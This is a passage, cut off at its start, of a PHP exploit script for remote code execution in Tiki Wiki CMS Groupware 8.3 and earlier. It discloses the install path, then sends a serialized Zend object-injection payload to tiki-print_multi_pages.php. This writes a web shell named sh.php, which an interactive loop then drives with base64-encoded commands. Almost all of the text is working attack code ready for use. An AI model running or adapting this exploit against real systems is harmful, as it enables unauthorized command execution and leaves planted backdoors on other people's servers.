(.*)tiki-rss/', http_send($host, $packet), $m)) die("\n[-] Path not found!\n"); return $m[1]; } print "\n+----------------------------------------------------------------------+"; print "\n| Tiki Wiki CMS Groupware <= 8.3 Remote Code Execution Exploit by EgiX |"; print "\n+----------------------------------------------------------------------+\n"; if ($argc < 3) { print "\nUsage......: php $argv[0] \n"; print "\nExample....: php $argv[0] localhost /"; print "\nExample....: php $argv[0] localhost /tiki/\n"; die(); } list($host, $path) = array($argv[1], $argv[2]); $f_path = get_path(); print "\n[-] Path disclosure: {$f_path}\n"; class Zend_Search_Lucene_Index_FieldInfo { public $name = ''; } class Zend_Search_Lucene_Storage_Directory_Filesystem { protected $_dirPath = null; public function __construct($path) { $this->_dirPath = $path; } } interface Zend_Pdf_ElementFactory_Interface {} class Zend_Search_Lucene_Index_SegmentWriter_StreamWriter implements Zend_Pdf_ElementFactory_Interface { protected $_docCount = 1; protected $_name = 'foo'; protected $_directory; protected $_fields; protected $_files; public function __construct($directory, $fields) { $this->_directory = $directory; $this->_fields = array($fields); $this->_files = new stdClass; } } class Zend_Pdf_ElementFactory_Proxy { private $_factory; public function __construct(Zend_Pdf_ElementFactory_Interface $factory) { $this->_factory = $factory; } } // http://www.suspekt.org/downloads/POC2009-ShockingNewsInPHPExploitation.pdf $directory = new Zend_Search_Lucene_Storage_Directory_Filesystem($f_path."sh.php\0"); $__factory = new Zend_Search_Lucene_Index_SegmentWriter_StreamWriter($directory, new Zend_Search_Lucene_Index_FieldInfo); $____proxy = new Zend_Pdf_ElementFactory_Proxy($__factory); $payload = urlencode(serialize($____proxy)); $payload = str_replace('%00', '%2500', $payload); $payload = "printpages={$payload}"; $packet = "POST {$path}tiki-print_multi_pages.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Content-Length: ".strlen($payload)."\r\n"; $packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; $packet .= "Connection: close\r\n\r\n{$payload}"; if (preg_match('/multiprint/', http_send($host, $packet))) die("[-] Multi-print feature disabled!\n"); $packet = "GET {$path}sh.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Cmd: %s\r\n"; $packet .= "Connection: close\r\n\r\n"; while(1) { print "\ntiki-shell# "; if (($cmd = trim(fgets(STDIN))) == "exit") break; $response = http_send($host, sprintf($packet, base64_encode($cmd))); preg_match('/___(.*)/s', $response, $m) ? print $m[1] : die("\n[-] Exploit failed!\n"); }